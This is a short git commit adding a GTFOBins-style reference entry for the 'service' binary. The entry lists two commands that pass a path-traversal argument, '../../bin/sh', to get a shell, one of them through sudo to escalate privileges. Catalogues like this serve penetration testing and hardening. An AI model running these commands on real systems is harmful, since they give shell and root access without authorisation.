Add service shell

This commit is contained in:
Andrea Cardaci 2019-03-25 19:54:58 +01:00
parent 13ab3596bb
commit 336abc79bb

7
_gtfobins/service.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: /usr/sbin/service ../../bin/sh
sudo:
- code: sudo service ../../bin/sh
---